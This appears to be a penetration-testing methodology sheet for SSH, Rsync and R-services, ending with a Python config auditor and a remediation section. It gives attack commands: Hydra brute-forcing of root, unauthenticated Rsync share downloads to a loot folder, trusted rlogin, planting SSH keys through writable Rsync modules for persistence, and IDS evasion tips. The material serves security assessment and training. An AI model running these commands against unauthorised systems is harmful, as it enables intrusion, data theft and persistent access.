🛡️ Methodology Checklist
- SSH version: `ssh-keyscan -t rsa [TARGET]` + banner grab
- Test anonymous/default creds: root, admin, user
- Brute-force SSH: `hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[TARGET]`
- Rsync probe: `rsync [TARGET]::` — list exposed modules
- Access rsync share: `rsync [TARGET]::[MODULE]/ /tmp/loot/`
- R-Services check (port 513/514): `rlogin -l root [TARGET]`
- Check `.rhosts` / `/etc/hosts.equiv` for trust relationships
- Document all remote access paths and credentials found
🎯 Operational Context
Think Dumber First: SSH version fingerprinting leaks OS version even with banner stripping disabled. Check Rsync first — `rsync [TARGET]::` lists modules without authentication. Writable Rsync module means you can plant an SSH authorized_key for instant persistent access. R-services (rsh/rlogin) are essentially authentication-free on misconfigured hosts.
When you land here: SSH/Rsync/RSH ports open. Banner grab SSH version. Try `rsync [TARGET]::` immediately. If SSH key-based auth only, check `/home/*/.ssh/authorized_keys` and `known_hosts` for pivot chains. For Rsync, list modules, mount, and search for SSH keys/configs.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `sudo nmap -sV -p22 [TARGET_IP]` | Detect SSH version and banner |
| `git clone https://github.com/jtesta/ssh-audit.git && ./ssh-audit/ssh-audit.py [TARGET_IP]` | Analyze SSH algorithms and weaknesses |
| `ssh -v [USER]@[TARGET_IP]` | Verbose connect — list supported auth methods |
| `ssh -v [USER]@[TARGET_IP] -o PreferredAuthentications=password` | Test if password auth is accepted |
| `sudo nmap -sV -p873 [TARGET_IP]` | Detect Rsync service |
| `nc -nv [TARGET_IP] 873` | Probe Rsync — list available modules |
| `rsync -av --list-only rsync://[TARGET_IP]/[SHARE]` | List Rsync share contents |
| `rsync -av rsync://[TARGET_IP]/[SHARE] ./local_copy` | Download Rsync share |
| `sudo nmap -sV -p512,513,514 [TARGET_IP]` | Detect R-Services |
| `rlogin [TARGET_IP] -l [USERNAME]` | R-Services login (no password if trusted) |
| `rwho` | List logged-in users (UDP 513 broadcast) |
| `rusers -al [TARGET_IP]` | List users on remote host |
🔬 Deep Dive & Workflow
Initial Enumeration
- Nmap SSH: `sudo nmap -sV -p22 [TARGET_IP]`
- Run `ssh-audit.py [TARGET_IP]` — check for weak algorithms, CBC ciphers, MD5 MACs
- `ssh -v [USER]@[TARGET_IP]` — note the "Authentications that can continue" list
- Check for R-Services: `sudo nmap -sV -p512,513,514 [TARGET_IP]`
- Check for Rsync: `sudo nmap -sV -p873 [TARGET_IP]`
- If Rsync found: `nc -nv [TARGET_IP] 873` → list modules, then `rsync -av --list-only rsync://[TARGET_IP]/[MODULE]`
Attacks
- SSH: Password brute-force if `PasswordAuthentication yes` (Hydra/Medusa)
- SSH: Check for weak private keys in exposed shares/repos (RSA <2048, DSA)
- Rsync: List and download shares without auth if misconfigured
- R-Services: Check `/etc/hosts.equiv` and `~/.rhosts` for wildcard `+` entries
- rlogin: If `.rhosts` has your IP as trusted → authenticate without password
SSH (Port 22)
Provides encrypted communication for remote command execution, file transfer, and port forwarding.
Auth methods: Password (brute-forceable) | Public Key (more secure — private key + passphrase)
Dangerous sshd_config Settings:
| Setting | Risk |
|---|---|
| `PasswordAuthentication yes` | Brute-force susceptible |
| `PermitRootLogin yes` | Direct root login |
| `PermitEmptyPasswords yes` | Critical — blank passwords allowed |
| `Protocol 1` | SSHv1 — vulnerable to MitM |
| `X11Forwarding yes` | Historical command injection vulnerabilities |
Rsync (Port 873)
File synchronization tool — can run standalone or over SSH.
- Standalone daemon: modules (shares) may be accessible without auth.
- Download entire share: `rsync -av rsync://[TARGET_IP]/[MODULE] ./local_copy`
R-Services (Ports 512, 513, 514)
Legacy unencrypted remote tools. Trust relationships defined by IP/hostname — not password.
| Command | Daemon | Port | Description |
|---|---|---|---|
| `rexec` | rexecd | 512 | Remote execution (password req.) |
| `rlogin` | rlogind | 513 | Remote login (password-free if trusted) |
| `rsh` | rshd | 514 | Remote shell |
| `rcp` | rshd | 514 | Remote file copy |
Trust files: /etc/hosts.equiv and ~/.rhosts
- Format: `<hostname> <username>`
- Wildcard `+` in either field = any host/user trusted = critical misconfiguration
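The rsyncd.conf and trust-file misconfigurations described above (a module with no `auth users`/`secrets file`, no `hosts allow`, or `read only = no`; a `+` wildcard in hosts.equiv or .rhosts) can be checked from the config files themselves. The following auditor is an added example, not code from the original page; the sample configs are constructed, and the rsyncd.conf parser is simplified (it handles `[module]` sections and global-section defaults only).

```python
import re

# Constructed sample configs showing the misconfigurations this page lists.
RSYNCD_CONF = """\
[backup]
  path = /srv/backup
  read only = no
[docs]
  path = /srv/docs
  auth users = deploy
  secrets file = /etc/rsyncd.secrets
  hosts allow = 10.0.0.0/24
"""
HOSTS_EQUIV = "# trusted build host\nbuildhost alice\n+ +\n"

def audit_rsyncd(text):
    """Flag modules with no auth, no hosts allow, or read only = no.
    Options in the global section (before any [module]) act as defaults."""
    modules, current = {"": {}}, ""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if m := re.match(r"\[(.+)\]$", line):
            current = m.group(1)
            modules[current] = {}
        elif "=" in line:
            k, _, v = line.partition("=")
            modules[current][k.strip().lower()] = v.strip().lower()
    findings = []
    for name, opts in modules.items():
        if not name:
            continue
        opts = {**modules[""], **opts}  # apply global defaults
        if not ("auth users" in opts and "secrets file" in opts):
            findings.append(f"{name}: no authentication (auth users/secrets file)")
        if "hosts allow" not in opts:
            findings.append(f"{name}: no IP restriction (hosts allow)")
        if opts.get("read only") == "no":
            findings.append(f"{name}: writable module")
    return findings

def audit_rhosts(text):
    """Return hosts.equiv/.rhosts entries with a '+' wildcard in the host or user field."""
    bad = []
    for line in text.splitlines():
        fields = line.split()
        if fields and not fields[0].startswith("#") and "+" in fields[:2]:
            bad.append(line.strip())
    return bad
```

Each finding maps directly to a line in the Recommendation section (require `auth users` + `secrets file`, set `hosts allow`, remove wildcard trust entries).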
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| SSH fails ‘no matching key exchange method offered’ | Modern client rejects old algorithms on legacy target | Add to command: -oKexAlgorithms=+diffie-hellman-group1-sha1 -oCiphers=+aes128-cbc |
| Rsync connection times out despite port 873 open | rsync daemon requires specific module path | List modules first: rsync [TARGET]::; then access: rsync -av [TARGET]::[MODULE] /tmp/loot |
| Rsync lists modules but access denied | IP restriction on rsync daemon | Check if your VPN IP matches allowed range in /etc/rsyncd.conf; try from a pivot host inside the network |
| SSH login hangs at ‘debug1: SSH2_MSG_SERVICE_REQUEST sent’ | IDS/firewall dropping session post-handshake after fingerprint | Add -v for verbose; try -o ConnectTimeout=10; rotate VPN connection |
| R-services connection refused on 513/514 | rsh/rlogin service not running | Check with nmap: nmap -p 512,513,514 -sV [TARGET]; may need rsh-client package: apt install rsh-client |
📝 Reporting Trigger
Finding Title: Unauthenticated Rsync Service / R-Services Exposed
Impact: Read/write access to server filesystem via Rsync without credentials enables sensitive file exfiltration and SSH key injection for persistent access. R-services allow shell access with minimal authentication.
Root Cause: Rsync daemon configured without auth users and secrets file directives. R-services (rsh, rlogin) enabled with permissive hosts.equiv or .rhosts configuration.
Recommendation: Require authentication for all Rsync modules (auth users + secrets file). Disable R-services entirely — replace with SSH. Restrict Rsync access by IP (hosts allow = [AUTHORIZED_IP]). Disable SSH password authentication; enforce key-based auth.